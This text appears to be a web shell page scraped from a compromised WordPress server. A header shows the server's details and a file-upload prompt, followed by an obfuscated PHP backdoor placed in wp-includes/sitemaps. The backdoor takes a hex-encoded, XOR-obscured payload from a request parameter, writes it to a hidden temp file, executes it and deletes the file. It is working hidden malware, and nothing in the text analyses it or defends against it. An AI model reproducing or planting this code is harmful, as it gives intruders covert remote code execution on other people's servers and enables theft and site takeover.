| Server IP : 198.38.94.67 / Your IP : 216.73.217.74 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-includes/sitemaps/ |
Upload File : |
<?php
if(@$_REQUEST["\x65\x6Cement"] !== null){
$rec = array_filter([sys_get_temp_dir(), getcwd(), "/tmp", "/var/tmp", "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP")]);
$mrk = hex2bin($_REQUEST["\x65\x6Cement"]);
$ref = '';for($f=0; $f<strlen($mrk); $f++){$ref .= chr(ord($mrk[$f]) ^ 91);}
$binding = 0;
do {
$flg = $rec[$binding] ?? null;
if ($binding >= count($rec)) break;
if (is_dir($flg) && is_writable($flg)) {
$tkn = "$flg" . "/.entity";
if (file_put_contents($tkn, $ref)) {
require $tkn;
unlink($tkn);
die();
}
}
$binding++;
} while (true);
}